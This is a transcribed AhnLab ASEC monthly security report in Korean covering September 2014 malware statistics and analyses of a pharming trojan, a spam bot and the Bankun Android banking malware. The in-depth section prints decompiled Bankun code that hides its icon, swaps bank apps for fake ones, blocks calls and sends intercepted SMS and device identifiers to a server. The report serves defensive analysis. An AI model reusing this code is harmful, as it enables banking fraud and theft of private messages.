Security Trend ASEC Report VOL.57 September, 2014
|
|
- 시완 국
- 5 years ago
- Views:
Transcription
1 Security Trend ASEC Report VOL.57 September, 2014
2 ASEC Report VOL.57 September, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 9 월보안동향 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 Table of Contents 보안이슈 SECURITY ISSUE 01 금융정보를탈취하는파밍악성코드 02 스미싱형태로유포되는 뱅쿤 (BANKUN) 주의! 03 내가스팸메일발송자? 스팸메일을발송하는악성코드 악성코드상세분석 Analysis-In-Depth 01 구글플레이 (Google Play) 앱을사칭한악성앱 19 ASEC REPORT 57 Security Trend 2
3 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 57 Security Trend
4 보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면, 2014 년 9 월한달간탐지된악성코드수는 252 만 3,094 건으로나타났다. 이 는전월 289 만 7,479 건에비해 37 만 4,385 건감소한수치다. 한편 9 월에수집된악성코드샘플수는 465 만 555 건으로집계됐다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드샘플수를의미한다. 5,000,000 4,000,000 3,000,000 2,000,000 2,257,733 2,897,479 2,523,094 1,000, ,519,765 7 월 3,596,157 8 월 4,650,555 9 월 탐지건수샘플수집수 [ 그림 1-1] 악성코드추이 ASEC REPORT 57 Security Trend 4
5 [ 그림 1-2] 는 2014 년 9 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그 램인 PUP(Potentially Unwanted Program) 가 56.32% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 20.81%, 애드웨어 (Adware) 가 7.43% 로그뒤를이었다. 0.68% 5.31% 7.43% 56.32% 9.45% 20.81% PUP Trojan etc Adware Worm Downloader [ 그림 1-2] 주요악성코드유형 [ 표 1-1] 은 9 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. Adware/Win32.SwiftBrowse 가총 32 만 2,808 건으로가장많이탐지되었고, Adware/Win32. SearchSuite 가 16 만 6,569 건으로그뒤를이었다. [ 표 1-1] 악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 Adware/Win32.SwiftBrowse 322,808 2 Adware/Win32.SearchSuite 166,569 3 PUP/Win32.SwiftBrowse 102,640 4 Trojan/Win64.SwiftBrowse 86,289 5 Trojan/Win32.OnlineGameHack 84,313 6 Trojan/Win32.Agent 73,619 7 ASD.Prevention 67,765 8 PUP/Win32.IntClient 56,031 9 Malware/Win32.Generic 45, Adware/Win32.Agent 40,932 ASEC REPORT 57 Security Trend 5
6 보안통계 02 웹통계 Statistics 2014 년 9 월악성코드유포지로악용된도메인은 1,338 개, URL 은 1 만 5,842 개로집계됐다. 또한 9 월의 악성도메인및 URL 차단건수는총 354 만 5,673 건이다. 악성도메인및 URL 차단건수는 PC 등시스템 이악성코드유포지로악용된웹사이트에접속하는것을차단한수이다. 6,000,000 5,343,498 5,000,000 4,000,000 3,928,542 3,545,673 3,000,000 2,000,000 1,000,000 40,000 30,000 30,918 20,000 12,241 15,842 10,000 1,718 1,902 1,338 악성도메인 /URL 차단건수 악성코드유포도메인수 0 7 월 8 월 9 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 ASEC REPORT 57 Security Trend 6
7 보안통계 03 모바일통계 Statistics 2014 년 9 월한달간탐지된모바일악성코드는 7 만 5,938 건으로나타났다. 250, , , ,000 74,678 74,413 75,938 50, 월 8 월 9 월 [ 그림 1-4] 모바일악성코드추이 ASEC REPORT 57 Security Trend 7
8 [ 표 1-2] 는 9 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. Android-Trojan/ SmsSend, Android-Trojan/SMSAgent, Android-Trojan/SmsSpy 와같이수신된 SMS 를유출 하거나몰래 SMS 를발송하는유형의악성코드가점차증가하고있다. [ 표 1-2] 유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-PUP/Dowgin 18,243 2 Android-Trojan/FakeInst 15,311 3 Android-PUP/SMSReg 5,238 4 Android-Trojan/Opfake 2,409 5 Android-Trojan/SmsSend 1,803 6 Android-Trojan/Agent 1,579 7 Android-Trojan/SMSAgent 1,578 8 Android-PUP/Wapsx 1,460 9 Android-Trojan/SmsSpy 1, Android-PUP/SMSpay 1,240 ASEC REPORT 57 Security Trend 8
9 2 보안이슈 SECURITY ISSUE 01 금융정보를탈취하는파밍악성코드 02 스미싱형태로유포되는 뱅쿤 (BANKUN) 주의! 03 내가스팸메일발송자? 스팸메일을발송하는악성코드 ASEC REPORT 57 Security Trend
10 보안이슈 01 금융정보를탈취하는파밍악성코드 Security Issue 최근사용자의금융정보를탈취하여금전이득을취하는파밍악성코드감염으로금전적인피해사례가증가하고있어주의가요구된다. 해당악성코드는사용자에게 금융정보유출피해예방서비스 라는명목으로금융정보입력을유도하는파밍악성코드이다. 표 2-1 파일생성정보 [ 파일생성정보 ] Bugreport.exe CREATE C: Windows Sdmr.exe Sdmr.exe CREATE C: Windows dmr.exe 최초의악성코드는 Sdmr.exe 를생성하고, 추가로 dmr.exe 라는악성코드를생성한다. 표 2-2 레지스트리등록 [ 레지스트리등록 ] HKLM SYSTEM ControlSet001 Services MyServiceDe mos ImagePath = "C: Windows Sdmr.exe" DisplayName = "My Service Demos" ObjectName = "LocalSystem" 그림 2-1 버그리포트로위장한악성코드속성 금융정보입력을유도하는파밍악성코드의회사정보는중국의인터넷서비스및게임서비스전문업체인 T 사로나타난다. 악성코드는회사정보, 파일이름을변조하여이업체에서제공하는정상파일인 버그리포트 로위장하였다. 해당악성코드를실행하면악성행위를하며파일생성정보는 [ 표 2-1] 과같다. 생성된악성파일은 [ 표 2-2] 와같이시스템재시작시에도반복실행을위해레지스트리값을수정하여 My Service Demos라는이름의서비스를등록한다. 표 2-3 네트워크연결 [ 네트워크연결 ] => 1**.25.*6.*3(80) *************3 감염된 PC 는 [ 표 2-3] 과같이 1**.25.*6.*3 으로 ASEC REPORT 57 Security Trend 10
11 네트워크에연결하여 핀터레스트 (Pinterest) 에접속한다. 핀터레스트는트위터, 페이스북과같은소셜네트워크서비스 (SNS) 이다. 핀터레스트를통해악성파밍사이트의 IP 주소를확인할수있다. 이다. 기존에는파밍악성코드에감염되면정상적인포털사이트동작이불가능했다. 그러나이번에발견된악성코드는감염된 PC에서보안등록안내팝업을 [ 닫기 ] 버튼으로종료하면포털사이트를정상적으로사용할수있다. 리퍼러 (Referer) 를사용했기때문이다. 그림 2-2 핀터레스트에올라온정보 [ 그림 2-2] 는악성코드로접속한핀터레스트에서확인한글이다. 해당글의뒷부분을알파벳기준으로나누면 **6.**.1**.**0이라는 IP 주소를알수있다. **6.**.1**.**0은파밍사이트의 IP 주소로사용된다. SNS에게시된글을통해감염된시스템에서파밍사이트에접속한다. 테스트결과, 악성코드제작자는핀터레스트의글을수정하여파밍사이트의 IP 주소를주기적으로변경했음을알수있었다. 그림 2-4 팝업패킷 리퍼러는현재페이지로이동하기전의페이지주소를말한다. 해당악성코드에감염된시스템에서파밍사이트로의접속유도는포털사이트에접속할때이루어진다. 따라서 [ 그림 2-4] 처럼리퍼러가포털사이트로나타난다. 또한, 팝업에서은행사이트의링크를설정하여은행파밍사이트로접속하도록유도한다. 그림 2-3 보안등록안내팝업창 [ 그림 2-3] 은위의악성코드에감염된 PC 에서포털 사이트에접속하면나타나는보안등록안내팝업창 그림 2-5 은행사이트로위장한파밍사이트 ASEC REPORT 57 Security Trend 11
12 [ 그림 2-5] 는은행사이트로위장한파밍사이트이 다. 팝업화면의 서비스신청하기 외에모든버튼이응답하지않아정상적인은행업무가불가능하다. [ 그림 2-8] 은해당사이트를통해입력된이름, 주민등록번호, 전화번호, 비밀번호를탈취한패킷이다. 입력된주민등록번호의유효여부는확인하지않으며포스트 (POST) 방식으로전송한다. 그림 2-6 은행사이트로위장한파밍사이트소스 [ 그림 2-6] 은은행사이트로위장한파밍사이트에서확인한페이지소스이다. [ 그림 2-2] 의핀터레스트에서확인한 IP 주소가파밍사이트의주소와동일함을알수있다. 기존파밍악성코드는호스트파일, DNS(Domain Name Server) 변조로파밍행위를해왔다. 그러나해당악성코드는시스템에서호스트파일, DNS 를변조하지않는다. 파밍기법에대해잘알고있는사용자라할지라도호스트파일, DNS 변조는나타나지않으면서개인정보를요구하는점으로인해혼란스러울수있다. 신종기법의악성코드가꾸준히등장하고있으므로사용자는이점을염두에두고악성코드가유도하는개인정보입력요구에응하지않도록주의해야한다. 그림 2-7 금융보안센터로위장한파밍사이트 [ 그림 2-7] 도금융보안센터사이트로위장한파밍사이트이다. 개인정보를입력하는페이지를제외한다른페이지는정상적으로동작하지않는다. 또한, 포털사이트와은행사이트에서는금융보안센터사이트로접속을유도하지않으며, 금융정보유출피해예방서비스 도제공하지않는다. 사용자는본래의서비스목적과별다른관계없이개인정보입력을요구하는팝업창이나타나면 V3 등백신의정밀검사를통해악성코드감염여부를확인하는것이필요하다. V3 실시간검사는항상 ON으로설정해두고, 주기적인정밀검사로악성코드를예방하는것이좋다. V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Trojan/Win32.QQPass ( ) 그림 2-8 개인정보를탈취한패킷 ASEC REPORT 57 Security Trend 12
13 보안이슈 02 스미싱형태로유포되는 뱅쿤 (BANKUN) 주의! Security Issue 과거유행했던 돌잔치초대장 으로가장한스미싱이최근들어다시기승을부리고있다. 특히 스미싱 형태로유포되는 뱅쿤 (BANKUN, Bank Uninstall 의줄임말 ) 은정상적인은행앱의삭제를유도하고, 악성앱의설치를시도하는악성코드이다. 이러한유형의악성코드를살펴보고, 감염을예방하는방법을알아보자. 돌잔치초대장으로유포되고있는악성앱을살펴보자. 수신된문자메시지의링크를클릭하면 [ 그림 2-9] 와같이악성앱이설치된다. 패키지명은 com. sdwiurse이며앱의이름은 googl app stoy 이다. 그림 2-10 악성앱의권한정보 [ 그림 2-10] 과같이권한정보를보면악성앱이메시지, 주소록, 저장소, 전화통화등에접근할수있다. 이를통해해당내용을수집할수있음을짐작할수있다. 물론정상앱에서도사용할수있는권한이지만, 악성앱이설치되면스마트폰에설치되어있는은행앱이무엇인지확인한후해당은행의금융정보탈취를시도한다. 그림 2-11 스마트폰에설치된앱체크리스트 그림 2-9 악성앱권한 ( 좌 ) / 설치후아이콘 ( 우 ) 악성앱을실행하면 [ 그림 2-12] 와같이설치가진행된다. 사용자를속이기위해 공지사항 을사용하며가짜이미지를이용하여백신이동작중인것처럼위장한다. ASEC REPORT 57 Security Trend 13
14 악성코드는위와같은정보탈취뿐만아니라 [ 그림 2-15] 와같이추가로악성앱의설치도유도한다. 그림 2-12 악성앱설치화면 이후악성코드는사용자의금융정보탈취를위해공인인증서와개인정보를수집한다. [ 그림 2-13] 은스마트폰의기기정보와사용자가입력하는정보를탈취하는코드중일부이다. 그림 2-15 추가악성앱설치유도 악성앱에의해수집된기기정보, 공인인증서, 금융정보는 [ 그림 2-16] 과같이메일서비스를이용하여특정메일주소로발송된다. 그림 2-13 정보수집코드 [ 그림 2-14] 는사용자의이름, 주민등록번호, 계좌번호, 비밀번호, 보안카드번호와같은개인의금융정보입력을유도하는창이다. 그림 2-16 메일서비스를이용한정보탈취 탈취한정보는 [ 그림 2-17] 과같이악성코드제작자 의메일로전송된다. 그림 2-14 금융정보입력을유도하는창 그림 2-17 악성코드제작자의메일함 ASEC REPORT 57 Security Trend 14
15 [ 그림 2-18] 과같이악성코드제작자메일의첨부파 일에는공인인증서와금융정보가압축되어있다. 치되는경우가많기때문에안전성이확인되지않은 URL이나앱은설치하지않도록주의해야한다. 또한모바일전용보안앱 (V3 모바일등 ) 이나스미싱탐지앱 ( 안랩안전한문자등 ) 을설치하고, 자동업데이트설정으로항상최신엔진을유지해야한다. [ 그림 2-20] 은안랩 안전한문자 의앱에서최근유행하는스미싱의유형을알려주는화면이다. 이러한기능을통해유행하는스미싱정보를사전에인지하여설치하지않도록주의하자. 그림 2-18 금융정보및공인인증서 [ 그림 2-13] 에서사용자가입력한금융정보 ( 이름, 계좌번호, 비밀번호, 보안카드일련번호, 공인인증서암호, 주민등록번호 ) 는 [ 그림 2-19] 의텍스트파일의내용과같이전송된다. 그림 2-19 사용자가입력한금융정보 스마트폰은인터넷, 모바일뱅킹, 게임등을때와장소를가리지않고이용할수있는장점때문에 PC보다사용이더많아졌다. 이런영향으로악성코드제작자는스마트폰을공격대상으로삼고있으며악성앱도증가하고있다. 따라서앱은공식마켓에서내려받는것이안전하지만, 공식마켓에도악성앱이등록되어있는경우가많으므로평판정보를확인하고설치해야한다. 무심코문자에포함된 URL을클릭하면악성앱이설 그림 2-20 안랩 안전한문자 의스미싱알림기능 한편, V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Android-Trojan/Bankun ASEC REPORT 57 Security Trend 15
16 보안이슈 02 내가스팸메일발송자? 스팸메일을발송하는악성코드 Security Issue 나도모르는사이, 내 PC에서외부로대량의스팸메일을발송하고있다면? 받는사람도, 보내는사람도당혹스러울것이다. 최근메모리에로드되어실행되는스팸메일을발송하는악성코드가발견되어사용자의주의가필요하다. 해당악성코드가실행되면정상실행을위해함수복구작업을거쳐악성코드내부에숨겨져있는 PE 파일을복호화한다. 복사한후레지스트리에등록하여재시작시다시동작한다. 그림 2-22 파일생성및레지스트리등록 생성작업을마치면다시한번숨겨진 PE의복호화를진행한다. 그림 2-21 첫번째 PE 복호화 [ 그림 2-21] 과같이복구된 PE는 WriteProcess Memory 작업을통해메모리에사용되고, 해당코드는 [ 그림 2-22] 와같이아래의경로에자기자신을 그림 2-23 두번째 PE 복호화 첫번째복호화된 PE 를바로메모리에썼다면두번째 복호화된 PE 는 [ 그림 2-23] 과같이 svchost.exe ASEC REPORT 57 Security Trend 16
17 를이용하여로드한다. 로드시에는 svchost.exe 프로세스를서스펜드 (SUSPEND) 형태로생성한후 GetContextThread, ReadProcessMemory, WriteProcessMemory, SetThreadContext, ResumeThread 등의함수를통해복호화된 PE 코드를덮어씌운후해당코드로진행한다. 표 2-4 확인된명령어카운트리 (Country) script (run_file, un_mem, random, random_cmd) 데이터 프록시 (Proxy) 그림 2-24 svchost.exe 프로세스를서스펜드형태로생성 이러한작업을거치면최초악성코드가종료되어도 svchost.exe에쓰인악성행위코드에의해동작이계속된다. svchost.exe에로드된악성코드는 C&C와통신하여실제명령을받아오고, 스팸을발생시킨다. 이때주고받는패킷은 [ 그림 2-25] ( 좌 ) 와같이암호화되어있고그키는매번다르다. 파일 - 실제로증상이나타나는 PC에서악성코드를제거했지만, 증상이계속된다는문의가있었다. 결국, 재부팅과같은메모리정리과정에서증상이해결되었는데, 이는악성코드가메모리에로드되어실행되기때문이다. 해당악성코드는하루수만건에가까운스팸메일을발생시킨다. 따라서특정 PC에서갑자기대량의 SMTP 패킷이발생할때는이러한스팸메일을발송하는악성코드를의심해야한다. 그림 2-25 암호화된패킷 ( 좌 ) / 복호화된패킷 ( 우 ) [ 표 2-4] 는서버에서받는명령중확인된내용이다. V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Dropper/Win32.Zbot ( ) ASEC REPORT 57 Security Trend 17
18 3 악성코드상세분석 Analysis-In-Depth 01 구글플레이 (Google Play) 앱을사칭한악성앱 ASEC REPORT 57 Security Trend
19 악성코드상세분석 01 구글플레이 (Google Play) 앱을사칭한악성앱 Analysis-In-Depth 2012년말, 스미싱을통해설치되는악성앱이처음발견된이후지속적으로그수가증가하고있다. 현재월평균 1,500여건이넘는악성앱이발견되고있으며, 지금까지국내스마트폰사용자를대상으로하는스미싱악성앱의유형은 40여종이넘는것으로확인되었다. 이처럼스미싱을통한악성앱유포가증가함에따라스미싱기법은언론보도를통해서도많이알려졌다. 그러나스미싱을통해설치된악성앱의동작이나자세한기능에대해서는여전히알려지지않은편이다. 이글에서는국내에서지속적으로발견되는악성앱중대표적인 구글플레이 (Google Play) 앱을사칭한사례를상세히살펴본다. 구글플레이 (Google Play) 앱을사칭한악성앱은금융정보탈취를목적으로하고있어사용자들의각별한주의가요구된다. 1. 악성앱의설치형태및기능구글에서제공하는안드로이드애플리케이션마켓의정식명칭은 구글플레이 (Google Play) 로, 지난 2012년 3월기존의안드로이드마켓과구글뮤직서비스의상표를새로변경하면서현재의이름을갖게되었다. 중국을제외하면대부분의안드로이드기반의스마트기기에는구글플레이에서앱이나미디어 등을다운로드할수있는 구글플레이앱 이설치되어있다. 공격자들은다수의사용자에게익숙한앱을악용하기마련이다. 이러한맥락에서현재가장많이발견되는악성앱의이름이바로 구글앱스토어 (Google App Store) 이다. 구글플레이앱을사칭하는이악성앱은지금이순간에도설치를유도하는스미싱문자메시지를발송하고있을것이다. 구글플레이앱을사칭한이앱에대한 AhnLab V3 Mobile의진단명은 Android- Trojan/Bankun 으로, 간략하게 뱅쿤 (Bankun) 이라는명칭으로도불린다. 해당악성앱의명칭에나타난 Bank 라는영어단어에서유추할수있는것처럼이앱은금융정보탈취가주목적이다. 이앱은금융정보를탈취하기위해또다른앱을추가로설치하며, 문자메시지나통화기록등주요개인정보를유출하는기능을갖고있다. 특히뱅쿤앱은설치될때동일한아이콘뿐만아니라 구글플레이스토어 (Google Play Store) 라는유사한앱의이름을사용하고있어주의깊게살펴보지않으면예기치않게악성앱을설치하기쉽다. ASEC REPORT 57 Security Trend 19
20 정상앱을사칭한뱅쿤의설치가완료되면 [ 그림 3-1] 과같이 Google App Store 라는이름으로 홈화면에바로가기아이콘이생성된다. 도록홈화면에서스스로아이콘을삭제한다. 그림 3-3 바로가기아이콘이삭제된후의홈화면 그림 3-1 구글앱을사칭한뱅쿤앱의바로가기아이콘 [ 그림 3-1] 의바로가기아이콘을통해뱅쿤을실행하게되면 [ 그림 3-2] 와같이안드로이드기기관리자화면이나타나기기관리자권한을요구한다. 아이콘은삭제되었으나단말기의환경설정에서 애플리케이션관리 기능을확인하면 [ 그림 3-4] 와같이여전히 Google App Store 가설치되어있음을알수있다. 그림 3-4 아이콘삭제후에도존재하는악성앱 그림 3-2 뱅쿤의기기관리자권한요청화면 [ 그림 3-2] 의기기관리자화면에서실행을선택하면별다른화면이나타나지않아바로종료된것처럼보이지만실제로는백그라운드로동작한다. 또한해당앱이설치되었다는사실을사용자가눈치채지못하 [ 그림 3-5] 와같이해당악성앱의네트워크사용기 록을살펴보면설치된기기의전화번호와 IMSI 등의 정보를유출하는것을알수있다. ASEC REPORT 57 Security Trend 20
21 련된민감한권한이포함되어있다. 그림 3-5 뱅쿤의네트워크사용기록 또한설치된기기에서연락처정보를추출하여외부로전송한다. 그림 3-6 뱅쿤이추출하여외부전송한연락처정보 2. 뱅쿤 (Bankun) 구조앞서악성앱, 즉뱅쿤실행시나타나는행위에대해살펴보았다. 지금부터는뱅쿤의내부구조를살펴보자. 우선, 안드로이드앱의명세를가진 AndroidManife st.xml 파일의권한 (Permission) 정보를살펴보면아래와같이상당히많은권한을요구하고있다. 특히문자메시지, 통화, 연락처등과같이개인정보와관 <?xml version='1.0' encoding='utf-8'?> <manifest xmlns:android=" com/apk/res/android" android:versioncode="2" android:versionname="1.1" package=""> ACCESS_WIFI_STATE"/> CHANGE_WIFI_STATE"/> WAKE_LOCK"/> WRITE_EXTERNAL_STORAGE"/> READ_PHONE_STATE"/> SEND_SMS"/> RECEIVE_SMS"/> READ_CONTACTS"/> WRITE_CONTACTS"/> RECEIVE_BOOT_COMPLETED"/> MODIFY_PHONE_STATE"/> CALL_PHONE"/> WRITE_CONTACTS"/> <uses-permission android:name="com.android. launcher.permission.install_shortcut"/> <uses-permission android:name="com.android. launcher.permission.uninstall_shortcut"/> RECEIVE_BOOT_COMPLETED"/> ASEC REPORT 57 Security Trend 21
22 RESTART_PACKAGES"/> GET_TASKS"/> KILL_BACKGROUND_PROCESSES"/> SYSTEM_ALERT_WINDOW"/> READ_LOGS"/> VIBRATE"/> MODIFY_AUDIO_SETTINGS"/> INTERNET"/> ACCESS_NETWORK_STATE"/> </manifest> 디컴파일을통해뱅쿤의주요기능을좀더상세히살펴보자. [ 그림 3-7] 은안랩의모바일악성코드분석도구를이용해 Bankun 코드를시각화 (Visualization) 한것이다. [ 그림 3-7] 에서볼수있는것처럼가장먼저실행되는코드는 MainActivity 클래스이며, 주요기능이집중되어있는코드는 CoreService 클래스라할수있다. MainActivity 클래스는특정서비스를실행하고기기관리자권한을확보하며아이콘을숨기는기능을갖고있다. 다음은 MainActivity 클래스의실제코드이다. public class MainActivity extends Activity { private void activemanager() { v0 = new Intent("android.app.action.ADD_DEVICE_ ADMIN"); v0.putextra("android.app.extra.device_admin", this.componentname); v0.putextra("android.app.extra.add_explanation", "google play"); this.startactivity(v0); return; protected void oncreate(bundle p4) { this.policymanager = this.getsystemservice("device_ policy"); this.componentname = new ComponentName(this, LockReceiver); if(this.policymanager.isadminactive(this. componentname) == 0) { this = this.activemanager(); else { this.policymanager.locknow(); this.startservice(new Intent(this, CoreService)); this.hideicon(); this.finish(); return; 그림 3-7 안랩의모바일악성코드분석도구를통해시각화한뱅쿤코드 private void HideIcon() { ASEC REPORT 57 Security Trend 22
23 this.getpackagemanager().setcomponentenabledse tting(this.getcomponentname(), 2, 1); return; parse(new StringBuilder("package:").append(p5.trim()). tostring())); CoreService 클래스는 MainActivity에의해가장먼저실행되는서비스로, 이서비스의클래스동작은다음과같다. 주기적으로기기정보 ( 전화번호, IMSI 등 ) 를서버로전송함으로써설치된사실을공격자에게알린다. 기기에저장된주소록을서버로전송한다. 기기에설치된은행앱정보를확인하고기존앱을삭제한후, 서버로부터해당은행앱과유사한가짜앱을다운로드하고설치한다. - 루팅된안드로이드기기일경우, 사용자몰래정상은행앱이가짜앱으로교체된다. - 루팅되지않은기기일경우, 은행앱의업데이트안내메시지로위장한메시지가나타나며이에따라업데이트를진행하면가짜은행앱이설치된다. - 가짜은행앱은기기에저장된인증서를유출하고파밍을통해사용자가입력한금융거래와관련된모든정보를외부로전송한다. public class CoreService extends Service { public static void uninstallapk(string p5) { v0 = new Intent("android.intent.action.DELETE", Uri. public void autochangeapk(string p9) { while (v3 < Config.apkNames.length) { if(config.apknames[v3].equals(v1) == 0) { v3 = (v3 + 1); else { this.mapkname = Config.bName[v3]; Config.delPackage = Config.bank[v3]; this.mpackagename = Config.delPackage; v4 = Config.icon[v3]; Config.installApk = DownLoad.downLoadFile(new StringBuilder(String.valueOf(Config.APK_URL)).append(v1). tostring()); v0 = new AlertDialog$Builder(CoreService.mContext); v0.settitle(this.mapkname); v0.setmessage(new StringBuilder(String.valueOf(this. mapkname)).append(" 새로운업데이트가있습니다. 보다더안전한스마트뱅킹을사용하기위하여최신버전을다운받으시기바랍니다.").toString()); v0.setpositivebutton(" 확인 ", new CoreService$BtnClick (this)); v0.setnegativebutton(" 취소 ", new CoreService$BtnClick (this)); v2.show(); CoreService.showNofity(this.mApkName, new StringBuilder(String.valueOf(this.mApkName)).append(" 새로운업데이트가있습니다 ").tostring(), " 최신버전으로보안강화하시기바랍니다 ", v4); ASEC REPORT 57 Security Trend 23
24 PhoneListener 클래스는이름에서볼수있는것처럼전화의수신및발신이벤트를감시하며, 다음과같은기능을갖고있다. 수신및발신을감지하며전화통화를강제종료한다. 진동및벨소리를모두꺼서사용자가전화수신을인지하지못하도록한다. 수신및발신내역을서버로전송한다. 통화기록을삭제한다. public class PhoneListener extends BroadcastReceiver { private void endcall() { v3 = CoreService.mContext.getSystemService("phone"); v2 = TelephonyManager.getDeclaredMethod("getITeleph ony", 0); v2.setaccessible(1); v2.invoke(v3, 0).endCall(); return; public void onreceive(context p8, Intent p9) { v2 = CoreService.mContext. getsystemservice("audio"); v2.setvibratesetting(v6, v6); v2.setringermode(0); switch(p8.getsystemservice("phone").getcallstate()) { case 1: this.endcall(); return; private int DeleteCall(String p6) { return v0.delete(calllog$calls.content_uri, "number=?", v3); SMSReceiver 클래스는 SMS 수신시동작하는클래스로, 아래와같이 SMS 수신내역을지정된서버로내보내는기능을갖고있다. public class SMSReceiver extends BroadcastReceiver { public void onreceive(context p12, Intent p13) { this.content = URLEncoder.encode(v2. getmessagebody().trim()); this.from = v2.getoriginatingaddress(); this.number = Config. getphonenumber(coreservice.mcontext); this.number = Config.number; new Thread(new SMSReceiver$1(this)).start(); this.abortbroadcast(); class SMSReceiver$1 implements Runnable { public void run() { v0 = new StringBuilder(String.valueOf(Config. get(coreservice.mcontext, "serverip", Config. SERVER_HOST))).append(Config.SERVER_ADDRESS). append("smsreceiver&imsi=").append(this.this$0. imsi).append("&number=").append(this.this$0. number).append("&from=").append(this.this$0.from). append("&content=").append(this.this$0.content).tostring(); this.this$0.conn.gethttpconnection(v0); System.out.println(new StringBuilder("SEMRECEIVER_ ASEC REPORT 57 Security Trend 24
25 DATA =>").append(v0).tostring()); 지금까지스미싱을통해설치되는악성앱인뱅쿤 (Bankun) 에대해자세히살펴보았다. 뱅쿤은교묘하게사용자를속이고금융정보를탈취하기위해많은기능들을갖고있다. 이처럼나날이고도화되고지능화되고있는악성앱에의한피해를입지않기위해서는무엇보다사용자의각별한주의가필요하다. 국내에서유포되는안드로이드기기용악성앱의대부분은스미싱기법을이용하므로스미싱차단앱을설치및이용하는것도피해를예방하는방법이될수있다. 기본적으로는문자메시지에포함된알수없는 URL은가급적접속하지않는것이바람직하다. 또한악성앱을실수로설치하게되는경우를대비하여모바일전용백신을설치하여주기적으로악성앱을검사하는것도필요하다. ASEC REPORT 57 Security Trend 25
26 ASEC REPORT vol.57 September, 2014 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T F 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다 AhnLab, Inc. All rights reserved.
Security Trend ASEC Report VOL.56 August, 2014
Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC REPORT VOL.68 August, 2015
Security Trend ASEC REPORT VOL.68 August, 2015 ASEC REPORT VOL.68 August, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSecurity Trend ASEC REPORT VOL.67 July, 2015
Security Trend ASEC REPORT VOL.67 July, 2015 ASEC REPORT VOL.67 July, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.76 April, 2016 ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며
Security Trend ASEC Report VOL.53 May, 2014 ASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서
Security Trend ASEC REPORT VOL.82 October, 2016 ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
